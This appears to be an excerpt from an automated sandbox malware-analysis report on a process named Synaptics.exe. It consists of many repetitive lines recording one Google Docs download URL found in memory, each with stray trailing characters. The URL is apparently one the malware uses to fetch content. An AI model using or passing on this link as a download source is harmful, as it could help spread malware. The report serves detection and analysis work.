                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9g
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:#222
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:G
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:j
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=-
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=L
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(
                              Source: Synaptics.exe, 00000003.00000002.2699912617.000000001D818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?i
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAL
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAg
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB..O
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBM
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC(
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH-U
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH-UA
                              Source: Synaptics.exe, 00000003.00000002.2699912617.000000001D818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCi
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDC
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEG
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEj
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFk
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG80N)
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadglN
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs0
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138173802.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhC
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh_:O
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhi6
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhq3
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiG
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadig
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadij
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin/
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadio
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadive.zB
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjk
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadki
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl=
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlF
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadliM=
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.tr
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/F/
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmaO
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne-bl
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniK
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnl
                              Source: Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadns
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntent?
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado)FO
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoB
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadodel=
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog$
                              Source: Synaptics.exe, 00000003.00000002.2699912617.000000001D818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoj
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
